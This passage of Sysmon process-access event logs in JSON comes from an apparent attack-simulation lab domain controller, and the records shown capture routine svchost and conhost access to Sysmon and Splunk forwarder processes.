06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:55.081\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-110B-5F25-0000-00104ED30500}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:55.081","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-110B-5F25-0000-00104ED30500}","TargetProcessId":"3884","TargetImage":"C:\\Program 